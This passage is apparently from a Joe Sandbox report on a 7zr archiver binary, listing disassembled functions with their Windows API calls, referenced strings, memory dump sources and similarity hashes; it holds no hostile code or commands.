                            • __EH_prolog.LIBCMT ref: 006DA389
                              • Part of subcall function 006DA4C5: GetModuleHandleW.KERNEL32(ntdll.dll,?,006DA3C1,00000001), ref: 006DA4CD
                              • Part of subcall function 006DA4C5: GetProcAddress.KERNEL32(00000000,RtlGetVersion), ref: 006DA4DD
                            Strings
                            Memory Dump Source
                            • Source File: 0000000A.00000002.1847196084.00000000006D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006D0000, based on PE: true
                            • Associated: 0000000A.00000002.1847141728.00000000006D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1847481070.000000000077C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1847665775.0000000000792000.00000004.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1847759485.000000000079B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_6d0000_7zr.jbxd
                            Similarity
                            • API ID: AddressH_prologHandleModuleProc
                            • String ID: : $ SP:$Windows
                            • API String ID: 786088110-3655538264
                            • Opcode ID: c07cb2a343b9a0f495d70d1e1c46bfa3a6f5a1559935550a5abed2fad3f16941
                            • Instruction ID: f688f058ddd8ce17e8fa6da087f1fd78e99cf945266e44dbe92aae2bb6429809
                            • Opcode Fuzzy Hash: c07cb2a343b9a0f495d70d1e1c46bfa3a6f5a1559935550a5abed2fad3f16941
                            • Instruction Fuzzy Hash: E3316F71C0010A9ACF65EBE1C8729EEBBB2BF28300F40406FE50672391DF715A89DA94
                            Function 006DA4C5 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 20libraryloaderCOMMON
                            Download Yara Rule
                            APIs
                            • GetModuleHandleW.KERNEL32(ntdll.dll,?,006DA3C1,00000001), ref: 006DA4CD
                            • GetProcAddress.KERNEL32(00000000,RtlGetVersion), ref: 006DA4DD
                            Strings
                            Memory Dump Source
                            • Source File: 0000000A.00000002.1847196084.00000000006D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006D0000, based on PE: true
                            • Associated: 0000000A.00000002.1847141728.00000000006D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1847481070.000000000077C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1847665775.0000000000792000.00000004.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1847759485.000000000079B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_6d0000_7zr.jbxd
                            Similarity
                            • API ID: AddressHandleModuleProc
                            • String ID: RtlGetVersion$ntdll.dll
                            • API String ID: 1646373207-1489217083
                            • Opcode ID: a8f709d605822e3953b1a129d5d5e4c83577dec5866aa2993cb89b85a95c8413
                            • Instruction ID: 2d0a45f597b777edaa91c9de6630ee4ac7e8d0c629c7b1fc66931656df1585fc
                            • Opcode Fuzzy Hash: a8f709d605822e3953b1a129d5d5e4c83577dec5866aa2993cb89b85a95c8413
                            • Instruction Fuzzy Hash: 5ED0C7B17582111BBA71A6F47C0EFE6168D8B45BD1715C86BF804D1140FADD9EC242A6
                            Function 006F0306 Relevance: 6.1, APIs: 4, Instructions: 89COMMON
                            Download Yara Rule
                            APIs
                            • GetFileSecurityW.ADVAPI32(?,00000007,?,?,00000000,?,?,00000000,?), ref: 006F0359
                            • GetLastError.KERNEL32(?,?,00000000,?), ref: 006F0382
                            • GetFileSecurityW.ADVAPI32(?,00000007,?,?,00000000,?,?,?,00000000,?), ref: 006F03DA
                            • GetLastError.KERNEL32(?,?,00000000,?,?,?,00000000,?), ref: 006F03F0
                            Memory Dump Source
                            • Source File: 0000000A.00000002.1847196084.00000000006D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006D0000, based on PE: true
                            • Associated: 0000000A.00000002.1847141728.00000000006D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1847481070.000000000077C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1847665775.0000000000792000.00000004.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1847759485.000000000079B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_6d0000_7zr.jbxd
                            Similarity
                            • API ID: ErrorFileLastSecurity
                            • String ID:
                            • API String ID: 555121230-0
                            • Opcode ID: 74eabfaa8113225d0d1d9db60b187487bbb4b968cef2bc4357097636033a3e1c
                            • Instruction ID: 132cc8dee15739e0a4a118be8065a5b70a3d4c09b729ce53c48ff3d7e0f3d781
                            • Opcode Fuzzy Hash: 74eabfaa8113225d0d1d9db60b187487bbb4b968cef2bc4357097636033a3e1c
                            • Instruction Fuzzy Hash: 97314B7590020AEFEB11DFA4C880BEEBBB6FF44344F108959E56697352D770AE41DBA0
                            Function 006D82FB Relevance: 6.1, APIs: 4, Instructions: 78COMMON
                            Download Yara Rule
                            APIs
                            • __EH_prolog.LIBCMT ref: 006D8300
                            • GetFileInformationByHandle.KERNEL32(000000FF,?,?,00000000,00000001,00000003,02200000,?,?,?), ref: 006D834F
                            • DeviceIoControl.KERNEL32(000000FF,000900A8,00000000,00000000,00000000,00004000,?,00000000), ref: 006D837C
                            • memcpy.MSVCRT(?,?,?,?,?,00000000,00000001,00000003,02200000,?,?,?), ref: 006D839B
                              • Part of subcall function 006D1E40: free.MSVCRT ref: 006D1E44
                            Memory Dump Source
                            • Source File: 0000000A.00000002.1847196084.00000000006D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006D0000, based on PE: true
                            • Associated: 0000000A.00000002.1847141728.00000000006D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1847481070.000000000077C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1847665775.0000000000792000.00000004.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1847759485.000000000079B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_6d0000_7zr.jbxd
                            Similarity
                            • API ID: ControlDeviceFileH_prologHandleInformationfreememcpy
                            • String ID:
                            • API String ID: 1689166341-0
                            • Opcode ID: 9c6f0fcf02891d7dd81a7a9c7fddeef4cafcc90fc36eafadb3d12f1493802930
                            • Instruction ID: 712f9988342c60c6a01f8389db066776db234e2ac7d55f7b0a9c556712880fb9
                            • Opcode Fuzzy Hash: 9c6f0fcf02891d7dd81a7a9c7fddeef4cafcc90fc36eafadb3d12f1493802930
                            • Instruction Fuzzy Hash: 7E2174B2900204AFDF119F94DC85EEE7BBAEB59750F10402EF94967351CA758E44C664
                            Function 007160D2 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 157COMMON
                            Download Yara Rule
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 0000000A.00000002.1847196084.00000000006D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006D0000, based on PE: true
                            • Associated: 0000000A.00000002.1847141728.00000000006D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1847481070.000000000077C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1847665775.0000000000792000.00000004.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1847759485.000000000079B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_6d0000_7zr.jbxd
                            Similarity
                            • API ID: H_prolog
                            • String ID: BlockPackSize$BlockUnpackSize
                            • API String ID: 3519838083-5494122
                            • Opcode ID: c7437f907441a7681b6618a094e5e1a53ee01d609c92c43938e9953d9e9a41c4
                            • Instruction ID: 868d4c58d7ff8d6f948a731380d73f47f25a5bbbb36eb8c7cd658bf20f0760b3
                            • Opcode Fuzzy Hash: c7437f907441a7681b6618a094e5e1a53ee01d609c92c43938e9953d9e9a41c4
                            • Instruction Fuzzy Hash: 9251B371C102859EDF39DBAC88A1AFD7BB1BF26310F28845ED096561D2D6399DC8E701
                            Function 006DA4F3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 89stringCOMMON
                            Download Yara Rule
                            APIs
                            • __EH_prolog.LIBCMT ref: 006DA4F8
                              • Part of subcall function 006DA384: __EH_prolog.LIBCMT ref: 006DA389
                              • Part of subcall function 006D9E14: GetSystemInfo.KERNEL32(?), ref: 006D9E36
                              • Part of subcall function 006D9E14: GetModuleHandleA.KERNEL32(kernel32.dll,GetNativeSystemInfo), ref: 006D9E50
                              • Part of subcall function 006D9E14: GetProcAddress.KERNEL32(00000000), ref: 006D9E57
                            • strcmp.MSVCRT ref: 006DA564
                            Strings
                            Memory Dump Source
                            • Source File: 0000000A.00000002.1847196084.00000000006D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006D0000, based on PE: true
                            • Associated: 0000000A.00000002.1847141728.00000000006D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1847481070.000000000077C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1847665775.0000000000792000.00000004.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1847759485.000000000079B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_6d0000_7zr.jbxd
                            Similarity
                            • API ID: H_prolog$AddressHandleInfoModuleProcSystemstrcmp
                            • String ID: -
                            • API String ID: 2798778560-3695764949
                            • Opcode ID: 7f77c5ebe3485caf1324ae12c3c2868bb600f478312b2b99454807b4132a8552
                            • Instruction ID: 86db650b806b71881a0997f1cc8e013782a9c8257839006c1f46c3605e9d9522
                            • Opcode Fuzzy Hash: 7f77c5ebe3485caf1324ae12c3c2868bb600f478312b2b99454807b4132a8552
                            • Instruction Fuzzy Hash: 8A313932D0120AEBCF55EBE0E8629EDB777AF64310F10406FE40172391DB759A49DA65
                            Function 00706184 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 66COMMON
                            Download Yara Rule
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 0000000A.00000002.1847196084.00000000006D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006D0000, based on PE: true
                            • Associated: 0000000A.00000002.1847141728.00000000006D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1847481070.000000000077C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1847665775.0000000000792000.00000004.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1847759485.000000000079B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_6d0000_7zr.jbxd
                            Similarity
                            • API ID: H_prolog
                            • String ID: 0$x
                            • API String ID: 3519838083-1948001322
                            • Opcode ID: c917e8c916400b46ba3faae33e8adb4532833d36abe0c3abc834cf921dc17f5b
                            • Instruction ID: b0a799ac756e402a8358f6f846264ed38505be2155f4a1906d50e73a0d28165c
                            • Opcode Fuzzy Hash: c917e8c916400b46ba3faae33e8adb4532833d36abe0c3abc834cf921dc17f5b
                            • Instruction Fuzzy Hash: 3A216F32D0111EDBCF04EB94D9A5AEDB7B6FF98304F10012AE90177282DB795E04CBA4
                            Function 00734034 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON
                            Download Yara Rule
                            APIs
                            • __EH_prolog.LIBCMT ref: 00734039
                              • Part of subcall function 007340BA: __EH_prolog.LIBCMT ref: 007340BF
                              • Part of subcall function 00715E2B: __EH_prolog.LIBCMT ref: 00715E30
                            Strings
                            Memory Dump Source
                            • Source File: 0000000A.00000002.1847196084.00000000006D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006D0000, based on PE: true
                            • Associated: 0000000A.00000002.1847141728.00000000006D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1847481070.000000000077C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1847665775.0000000000792000.00000004.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1847759485.000000000079B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_6d0000_7zr.jbxd
                            Similarity
                            • API ID: H_prolog
                            • String ID: D.x$T.x
                            • API String ID: 3519838083-3356495739
                            • Opcode ID: 0a1efd9b6eeaf552ac33fb031909d1f49505a6b71e821ef432bcbbc380249329
                            • Instruction ID: dbaa551261a3c2ae6112c55f1e61ad048cd1a12e07c683a9a113f443c29637fe
                            • Opcode Fuzzy Hash: 0a1efd9b6eeaf552ac33fb031909d1f49505a6b71e821ef432bcbbc380249329
                            • Instruction Fuzzy Hash: 650144B0911B04CFC728DF68C50969ABBF4FF08704F00896ED09A93742D7B8A648CB91
                            Function 007082DD Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 27COMMON
                            Download Yara Rule
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 0000000A.00000002.1847196084.00000000006D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006D0000, based on PE: true
                            • Associated: 0000000A.00000002.1847141728.00000000006D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1847481070.000000000077C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1847665775.0000000000792000.00000004.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1847759485.000000000079B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_6d0000_7zr.jbxd
                            Similarity
                            • API ID: fputs
                            • String ID: =
                            • API String ID: 1795875747-2525689732
                            • Opcode ID: bd5f0c6bd6048a6b2634b42c2cff4d8197f399670170023fb1d16c5ba0ab80a0
                            • Instruction ID: 93b651fa13be31928e956b914de81374752a4111fc4e3daa0b38b789f42ccfff
                            • Opcode Fuzzy Hash: bd5f0c6bd6048a6b2634b42c2cff4d8197f399670170023fb1d16c5ba0ab80a0
                            • Instruction Fuzzy Hash: C9E0DF71E00118ABCF00FBE89C51CBE7B69FBC43947500836E524CB281FA749921CBD9
                            Function 0070C2AC Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 16COMMON
                            Download Yara Rule
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 0000000A.00000002.1847196084.00000000006D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006D0000, based on PE: true
                            • Associated: 0000000A.00000002.1847141728.00000000006D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1847481070.000000000077C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1847665775.0000000000792000.00000004.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1847759485.000000000079B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_6d0000_7zr.jbxd
                            Similarity
                            • API ID: fputs
                            • String ID: Unsupported Windows version$p&y
                            • API String ID: 1795875747-3165590651
                            • Opcode ID: 3c87570e76a9f2252ff92b68ed78010dbf773eb8935b9fef50d628a54da1d1be
                            • Instruction ID: ec4beb434c37d5371fbec93ba39de5d9cc700bf119678780e44758f5d0b15abb
                            • Opcode Fuzzy Hash: 3c87570e76a9f2252ff92b68ed78010dbf773eb8935b9fef50d628a54da1d1be
                            • Instruction Fuzzy Hash: 26D0C9B7748240EFD70A9BC8F946BA477B0E788761F60896BE102D61D1D7BD64068B14
                            Function 007341C0 Relevance: 5.1, APIs: 4, Instructions: 57COMMON
                            Download Yara Rule
                            APIs
                            • memcmp.MSVCRT(?,007848A0,00000010), ref: 007341D6
                            • memcmp.MSVCRT(?,00780168,00000010), ref: 007341F1
                            • memcmp.MSVCRT(?,007801E8,00000010), ref: 00734205
                            Memory Dump Source
                            • Source File: 0000000A.00000002.1847196084.00000000006D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006D0000, based on PE: true
                            • Associated: 0000000A.00000002.1847141728.00000000006D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1847481070.000000000077C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1847665775.0000000000792000.00000004.00000001.01000000.0000000A.sdmpDownload File
                            • Associated: 0000000A.00000002.1847759485.000000000079B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_6d0000_7zr.jbxd
                            Similarity
                            • API ID: memcmp
                            • String ID:
                            • API String ID: 1475443563-0
                            • Opcode ID: 0bfd590ee79bf99ea311f20ee75cfeadfe05f820a9f07411f5925b2d037c8bd3
                            • Instruction ID: 151dcf0d853cd69ccebe24b79c4fc0dfd84e3fded8cfe2689684e53f9a181229
                            • Opcode Fuzzy Hash: 0bfd590ee79bf99ea311f20ee75cfeadfe05f820a9f07411f5925b2d037c8bd3
                            • Instruction Fuzzy Hash: 3401C471780209ABE7145B14DC42F7E73A4AF64760F044429FE46EB282F6BDB9509794